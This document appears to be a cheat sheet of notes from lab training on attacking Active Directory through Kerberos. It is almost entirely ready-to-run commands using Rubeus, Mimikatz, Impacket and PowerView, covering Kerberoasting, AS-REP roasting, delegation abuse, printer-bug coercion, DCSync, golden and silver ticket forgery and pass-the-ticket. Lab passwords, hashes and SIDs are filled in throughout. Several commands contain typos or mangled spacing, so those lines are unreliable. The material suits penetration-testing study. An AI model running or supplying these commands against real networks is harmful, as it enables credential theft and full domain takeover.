From Linux
GetUserSPN
Copy # Request 1 Ticket
GetUsersSPNs.py -dc-ip < i p > < domain/ < use r > -request-user < usernam e >
# Request All Tickets
GetUsersSPNs.py -dc-ip < i p > < domain/ < user --request
# Save to Output
GetUserSPNs.py -dc-ip < i p > INLANEFREIGHT.LOCAL/forend -request-user sqldev -outputfile sqldev_tgs
# Crack TGS Ticket
hashcat -m 13100 file.tgs $ROCKYOU
From Windows
setspn.exe
Copy # Find Accounts with SPN
setspn.exe - Q */*
# Better Command
setspn.exe - T INLANEFREIGHT.LOCAL - Q */* | Select-String '^CN' - Context 0 , 1 | % { New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken - ArgumentList $_.Context.PostContext [ 0 ].Trim() }
Mimikatz
Copy # Enable Base64 Output
base64 / out:true
# Export Tickets
kerberos::list / export
# Modify To Better Format
echo "<base64 blob>" | tr - d \\n
# Output To John Format
cat encoded_file | base64 - d > sqldev.kirbi
# Make to John Format
python2. 7 kirbi2john.py sqldev.kirbi
# HashCat Way, Modify to hashcat format
sed 's/\$krb5tgs\$\(.*\):\(.*\)/\$krb5tgs\$23\$\*\1\*\$\2/'
PowerView
Copy # Import Module
Import-Module .\PowerView.ps1
# List Users With SPN
Get-DomainUser * - spn | select samaccountname
# Target Single User + Hashcat Output
Get-DomainUser - Identity sqldev | Get-DomainSPNTicket - Format Hashcat
Rubeus
Copy # /Stats
.\ Rubeus.exe kerberoast / stats
# List Admin Privileges Users for Kerberoasting
.\ Rubeus.exe kerberoast / ldapfilter: 'admincount=1' / nowrap
Double Hop Workarounds
Method 1: PSCredential Object
Copy # Set password
$SecPassword = ConvertTo-SecureString '0xF0rk123!' - AsPlainText - Force
# Set Proper Login
$Cred = New-Object System.Management.Automation.PSCredential( 'INLANEFREIGHT\backupadm' , $SecPassword)
# Use Command with Credentials
get-domainuser - spn - credential $Cred | select samaccountname
Method 2: Register PSSession Configuration
Copy # Check HTTP Ticket Present
klist
# Configure PSSession
Register-PSSessionConfiguration - Name backupadmsess - RunAsCredential inlanefreight\backupadm
# Connect
Enter-PSSession - ComputerName DEV01 - Credential INLANEFREIGHT\backupadm - ConfigurationName backupadmsess
Roasting Attacks
AS-REPRoasting (Windows)
AS-REP Roasting Enumeration
Copy # PowerView: Discover Account with Pre-Authentication Disbaled
Get-DomainUser - UACFilter DONT_REQ_PREAUTH | select samaccountname , useraccountcontrol
# Rubeus: Enumerate all user Accounts for Pre-Authentication
Rubeus.exe asreproast / format:hashcat
Performing AS-REPRoasting
Copy # Rubeus
.\ Rubeus.exe asreproast / user:jenna.smith / domain:inlanefreight.local / dc:dc01.inlanefreight.local / nowrap / outfile:hashes.txt
# Crack the Hash
hashcat.exe - m 18200 hashes $ROCKYOU
Set DONT_REQ_PREAUTH (PowerView)
Copy Set-DomainObject - Identity userName -XOR @ {useraccountcontrol = 4194304 } - Verbose
AS-REPRoasting (LInux)
AS-REPRoasting Users Enumeration
Copy GetNPUsers.py inlanefreight.local/pixis -request
Find Accounts Without Authentication
Copy GetNPUsers.py INLANEFREIGHT/ -dc-ip 10.129.205.35 -usersfile /tmp/users.txt -format hashcat -no-pass
Kerberoasting (Windows)
Manual Detection (PowerShell Script)
Copy $search = New-Object DirectoryServices.DirectorySearcher([ ADSI ] "" )
$search.filter = "(&(objectCategory=person)(objectClass=user)(servicePrincipalName=*))"
$results = $search.Findall()
foreach ($result in $results)
{
$userEntry = $result.GetDirectoryEntry()
Write-host "User"
Write-Host "===="
Write-Host $userEntry.name "(" $userEntry.distinguishedName ")"
Write-host ""
Write-host "SPNs"
Write-Host "===="
foreach ($SPN in $userEntry.servicePrincipalName)
{
$SPN
}
Write-host ""
Write-host ""
}
# Run Script
.\FindSPNAccounts.ps1
Find Accounts with SPN (PowerView)
Copy # Find Accounts
Get-DomanUser - SPN | select samaccountname , serviceprincipalname , memberof
Invoke Kerberoasting (PowerView)
Rubeus Kerberoasting
Copy Rubeus.exe kerberoast / nowrap
Kerberoasting Without Account Password
https://www.semperis.com/blog/new-attack-paths-as-requested-sts/
In order to perform this attack, we need the following:
Username of an account with pre-authentication.
Copy Rubeus.exe kerberoast / nopreauth:amber.smith / domain:inlanefreight.local / spn:MSSQLSvc / SQL01: 1433 / nowrap
Kerberoasting (Linux)
Get Account SPN
Copy GetUserSPNs.py inlanefreight.local/pixis -request
Unconstrained Delegation
Unconstrained Delegation - Computer
Method 1 (Waiting Authentication)
1 Monitor Stored Tickets (Rubeus)
Copy .\ Rubeus.exe monitor / interval: 5 / nowrap
2 Using Captured Ticket to Request Another Ticket
Copy .\ Rubeus.exe asktgs / ticket: < base6 4> / service:cifs / dc01.INLANEFREIGHT.local / ptt
3 Using Newly ticket
Copy dir \\dc01.inlanefreight.local\c$
Method 2 (Printer Bug)
https://github.com/leechristensen/SpoolSample
1 Monitor Tickets
Copy .\ Rubeus.exe monitor / interval: 5 / nowrap
2 Abusing Printer Bug
Copy .\ SpoolSample.exe dc01.inlanefreight.local sql01.inlanefreight.local
3 Captare & Renew Ticket
Copy # Once Intercepted, we need to renew the ticket
.\ Rubeus.exe renew / ticket: < base6 4> / ptt
4 DcSync
Copy # Since we haveTicket from dc01 and can dump all the hashes
lsadump::dcsync
5 Using NT Hash
Copy # With DCSync, we are able to get all the hashes, we use the administrator hash to askTGT
.\ Rubeus.exe asktgt / rc4: < NT - Hash > / user: < user > / ptt
# Perform Actions on DC01
dir \\dc01.inlanefreight.local\c$
Unconstrained Delegation - Users
Gather Unconstrained Delegation Users (Powerview)
Copy Get-DomainUser - LDAPFilter "(userAccountControl:1.2.840.113556.1.4.803:=524288)" | select samaccountname , useraccountcontrol
1 Create Fake DNS Record
https://github.com/dirkjanm/krbrelayx
Copy # Host DNS Server
python dnstool.py -u INLANEFREIGHT.LOCAL \\ pixis -p p4ssw0rd -r roguecomputer.INLANEFREIGHT.LOCAL -d 10.10.14.2 --action add 10.129.1.207
2 Verify DNS
Copy nslookup roguecomputer.inlanefreight.local dc01.inlanefreight.local
3 Craft SPN
Copy python addspn.py -u inlanefreight.local \\ pixis -p p4ssw0rd --target-type samname -t sqldev -s CIFS/roguecomputer.inlanefreight.local dc01.inlanefreight.local
4 Decrypt Ticket
Copy sudo python krbrelayx.py -hashes :cf3a5525ee9414229e66279623ed5c58
5 Leveraging Printer Bug
https://github.com/dirkjanm/krbrelayx/blob/master/printerbug.py
Copy python3 printerbug.py inlanefreight.local/carole.rose:jasmine@10.129.205.35 fakepcs.inlanefreight.local
6 Perform Attack
Copy sudo python krbrelayx.py -hashes :cf3a5525ee9414229e66279623ed5c58
7 Export ccache + Secrets Dump
Copy export KRB5CCNAME =< ccache >
secretsdump.py -k -no-pass dc01.inlanefreight.local
Constrained Delegation
Constrained Delegation (Windows)
Gather Constrained Delegation Computers
Copy Get-DomainCoputer - TrustedAuth | select serviceprincipalname , dnshostname , useraccountcontrol
1 Get Machine Hash (Mimikatz)
Copy .\ mimikatz.exe privilege::debug sekurlsa::msv exit
2 Constrained Delegation Attack
Copy # Need Machine Hash as rc4
.\ Rubeus.exe s4u / impersonateuser:Administrator / msdsspn:www / WS01.inlanefreight.local / altservice:HTTP / user:DMZ01$ / rc4:ff955e93a130f5bb1a6565f32b7dc127 / ptt
# Verify Ticket
klist
# Enter Session
Enter-PSSession ws01.inlanefreight.local
Constrained Delegation (Linux)
1 Find Delegation Accounts
Copy findDelegation.py INLANEFREIGHT.LOCAL/carole.rose:jasmine
2 Craft Valid TGS Ticket
Copy getST.py -spn SERVER01 'INLANEFREIGHT.LOCAL/daniel.whitehead:dolphin' -impersonate Administrator
3 Login With TGS Ticket
Copy # Export ccache
export KRB5CCNAME =< ccache >
# Login
psexec.py -k -no-pass INLANEFREIGHT.LOCAL/administrator@DC01 -debug
Resource Based Delegation (Windows)
Enumerate RBCD Script
Copy # import the PowerView module
Import-Module C:\Tools\PowerView.ps1
# get all computers in the domain
$computers = Get-DomainComputer
# get all users in the domain
$users = Get-DomainUser
# define the required access rights
$accessRights = "GenericWrite" , "GenericAll" , "WriteProperty" , "WriteDacl"
# loop through each computer in the domain
foreach ($computer in $computers) {
# get the security descriptor for the computer
$acl = Get-ObjectAcl - SamAccountName $computer.SamAccountName - ResolveGUIDs
# loop through each user in the domain
foreach ($user in $users) {
# check if the user has the required access rights on the computer object
$hasAccess = $acl | ? { $_.SecurityIdentifier -eq $user.ObjectSID} | % {( $_.ActiveDirectoryRights -match ($accessRights -join '|' ))}
if ($hasAccess) {
Write-Output " $ ($user.SamAccountName) has the required access rights on $ ($computer.Name) "
}
}
}
1 Create Fake Computer
Copy # Import PowerMad
Import-Module .\Powermad.ps1
# Add New Computer
New-MachineAccount - MachineAccount HACKTHEBOX - Password $ ( ConvertTo-SecureString "Hackthebox123+!" - AsPlainText - Force)
2 Modify Attributes Created Computer
Use SDDL to create a security descriptor
Set msDS-AllowedToActOnBehalfOfOtherIdentity
in raw binary format.
Modify the target computer.
Copy # Import PowerView
Import-Module .\PowerView.ps1
# Step 1
$ComputerSid = Get-DomainComputer HACKTHEBOX - Properties objectsid | Select - Expand objectsid
# Step 2
$SD = New-Object Security.AccessControl.RawSecurityDescriptor - ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;; $ ($ComputerSid) )"
$SDBytes = New-Object byte[] ($SD.BinaryLength)
$SD.GetBinaryForm($SDBytes , 0 )
# Step 3
$credentials = New-Object System.Management.Automation.PSCredential "INLANEFREIGHT\carole.holmes" , ( ConvertTo-SecureString "Y3t4n0th3rP4ssw0rd" - AsPlainText - Force)
# Step 4
Get-DomainComputer DC01 | Set-DomainObject - Set @ { 'msds-allowedtoactonbehalfofotheridentity' = $SDBytes} - Credential $credentials - Verbose
3 Get Computer Hash
Copy .\ Rubeus.exe hash / password:Hackthebox123 +! / user:HACKTHEBOX$ / domain:inlanefreight.local
4 Request TGS Ticket
Copy # /altservice:host,RPCSS,wsman,http,ldap,krbtgt,winrm
.\ Rubeus.exe s4u / user:HACKTHEBOX$ / rc4:CF767C9A9C529361F108AA67BF1B3695 / impersonateuser:administrator / msdsspn:cifs / dc01.inlanefreight.local / ptt
# Connect to DC
ls \\dc01.inlanefreight.local\c$
Resource Based Delegation (Linux)
1 Create a New Computer
Copy addcomputer.py -computer-name 'HACKTHEBOX$' -computer-pass Hackthebox123+ \! -dc-ip 10.129.96.44 inlanefreight.local/carole.holmes: 'Y3t4n0th3rP4ssw0rd'
2 Add Computer to Trusted List
https://raw.githubusercontent.com/tothi/rbcd-attack/master/rbcd.py
Copy python3 rbcd.py -dc-ip 172.16.8.35 -t DC01 -f HACKTHEBOX 'inlanefreight.local/annette.jackson:horses'
3 Request TGS Ticket
Copy getST.py -spn cifs/DC01.inlanefreight.local -impersonate Administrator -dc-ip 10.129.96.44 inlanefreight.local/HACKTHEBOX:Hackthebox123+ \!
4 Export ccache & Login
Copy # Export ccache
export KRB5CCNAME =< ccache >
# psexec
psexec.py -k -no-pass dc01.inlanefreight.local
Ticket Abuse
Golden Ticket (Windows)
We need 4 elements in order to perform a Golden Ticket attack.
1 Gather Domain Name
2 Gather Domain SID
3 Gather krbtgt Hash
Copy .\ mimikatz.exe privilege::debug "lsadump::dcsync /user:krbtgt /domain:inlanefreight.local" exit
4 Forge Golden Ticket
Copy .\ mimikatz.exe "kerberos::golden /domain:inlanefreight.local /user:Administrator /sid:S-1-5-21-1870146311-1183348186-593267556 /rc4:c0231bd8a4a4de92fca0760c0ba9e7a6 /ptt" "exit"
5 Login
Golden Ticket (Linux)
1 Gather Domain (SID)
Copy lookupsid.py inlanefreight.local/pixis@dc01.inlanefreight.local -domain-sids
2 Create Golden Ticket
Copy ticketer.py -nthash c0231bd8a4a4de92fca0760c0ba9e7a6 -domain-sid S-1-5-21-1870146311-1183348186-593267556 -domain inlanefreight.local Administrator
3 Importing and Use Ticket
Copy export KRB5CCNAME =< ccache >
# Login
psexec.py -k -no-pass dc01.inlanefreight.local
Silver Ticket (Windows)
1 Gather Domain SID
2 Compromised Service Account
Copy Without this account , a silver ticket is not possible
3 Forge Silver Ticket
Copy .\ mimikatz.exe "kerberos::golden /domain:inlanefreight.local /user:Administrator /sid:S-1-5-21-1870146311-1183348186-593267556 /rc4:027c6604526b7b16a22e320b76e54a5b /target:sql01.inlanefreight.local /service:cifs /ptt" "exit"
Create Sacrificial Process
Copy # Create Process
Rubeus.exe createnetonly / program: cmd.exe / show
# Import Silver Ticket
Rubeus.exe ptt / ticket:sql01.kirbi
# Login
PSExec.exe - accepteula \\sql01.inlanefreight.local cmd
Silver Ticket (Linux)
1 Retrieve Domain SID
Copy lookupsid.py inlanefreight.local/pixis@dc01.inlanefreight.local -domain-sids
2 Create Silver Ticket
Copy ticketer.py -nthash 542780725df68d3456a0672f59001987 -domain-sid S-1-5-21-1870146311-1183348186-593267556 -domain inlanefreight.local -spn cifs/sql01.inlanefreight.local Administrator
3 Export ccache
Copy export KRB5CCNAME =< ccache >
# Login
smbclient.py -k -no-pass sql01.inlanefreight.local
Pass The Ticket
Pass-the-Ticket takes the user's Ticket Granting Ticket (TGT) or Ticket Granting Service (TGS) Ticket. The TGT is a signed ticket that contains a list of privilege levels. This TGT is passed to the Domain Controller, which will grant the TGS Ticket that can be used to access machines. Stealing either of these tickets makes it possible to perform lateral movement.
1 Create Sacrificial Process
Copy .\ Rubeus.exe createnetonly / program: "C:\Windows\System32\cmd.exe" / show
2 Read Tickets
Copy # krbtgt/INLANEFREIGHT.LOCAL
.\ Rubeus.exe dump / luid: 0x89275d / service:krbtgt / nowrap
4 Renew Ticket
Copy Rubeus.exe renew / ticket: < base6 4> / ptt
4 Read Files